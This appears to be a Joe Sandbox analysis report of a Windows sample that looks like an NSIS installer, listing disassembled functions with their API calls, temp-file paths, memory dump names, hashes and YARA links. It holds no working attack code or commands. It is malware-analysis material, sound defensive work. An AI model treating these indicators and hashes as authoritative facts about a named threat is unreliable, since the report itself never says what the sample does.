Opcode Fuzzy Hash: 4962a02234e0abb90451fdb835a69689ab3619d178ad395481c6dd35ba9f3239
Instruction Fuzzy Hash: 0A31CF715065C1FFCB148FA8FD99D6A7BB6FF8A314714452AF14187260C731A82B8B26

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98

Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
wsprintfW.USER32 ref: 00404B52
SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

%u.%u%s%s, xrefs: 00404B33
6B, xrefs: 00404B3B

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$6B
API String ID: 3540041739-3884863406
Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsrC488.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsrC488.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nsrC488.tmp, xrefs: 004025E1
C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsrC488.tmp$C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll
API String ID: 3109718747-235962091
Opcode ID: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
Opcode Fuzzy Hash: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E

Function 6FBF18DD Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 6FBF193E
GlobalFree.KERNEL32(?), ref: 6FBF1ADE
GlobalFree.KERNEL32(?), ref: 6FBF1AE3

Memory Dump Source

Source File: 00000000.00000002.2200727678.000000006FBF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBF0000, based on PE: true

Associated: 00000000.00000002.2200703347.000000006FBF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200746589.000000006FBF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200767970.000000006FBF5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fbf0000_Readouts.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 12fd20a802797f44ccdd625f2c2481758f2c8dc45cb550560d5cdc29117b1975
Instruction ID: f99f8074398acabd7319245f6f108c6c735e142f37f9da4f7c1929ce6c7b6df3
Opcode Fuzzy Hash: 12fd20a802797f44ccdd625f2c2481758f2c8dc45cb550560d5cdc29117b1975
Instruction Fuzzy Hash: B251B3F1D071D99A8B00DFB8F5805EDBAB5EF46314B08CA6BD420A7150D771BA8F87A1

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D

Function 6FBF1621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FBF21F0,?,00000808), ref: 6FBF1639
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FBF21F0,?,00000808), ref: 6FBF1640
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FBF21F0,?,00000808), ref: 6FBF1654
GetProcAddress.KERNEL32(6FBF21F0,00000000), ref: 6FBF165B
GlobalFree.KERNEL32(00000000), ref: 6FBF1664

Memory Dump Source

Source File: 00000000.00000002.2200727678.000000006FBF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBF0000, based on PE: true

Associated: 00000000.00000002.2200703347.000000006FBF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200746589.000000006FBF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200767970.000000006FBF5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fbf0000_Readouts.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: d89dfbf64b1b19b8f764ece703e8968dede1a9039e1da7231271af535d357389
Instruction ID: 98763b2899b446fe889c44ab621c96bd556b28a26c85dc3a535ba9e87aa97c75
Opcode Fuzzy Hash: d89dfbf64b1b19b8f764ece703e8968dede1a9039e1da7231271af535d357389
Instruction Fuzzy Hash: 78F012721075387BDA2126B79C4DD9BBE9CDF8B2F5B150212F6189219085618C12D7F2

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
Opcode Fuzzy Hash: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28

Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
Opcode Fuzzy Hash: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC

Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040528F
CallWindowProcW.USER32(?,?,?,?), ref: 004052E0

Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Strings

, xrefs: 00405270

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69

Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll), ref: 004061A3

Strings

Call, xrefs: 00406159

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
Opcode Fuzzy Hash: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4

Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
CloseHandle.KERNEL32(?), ref: 004058A3

Strings

Error launching installer, xrefs: 00405880

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78

Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
GlobalFree.KERNEL32(?), ref: 00403900

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

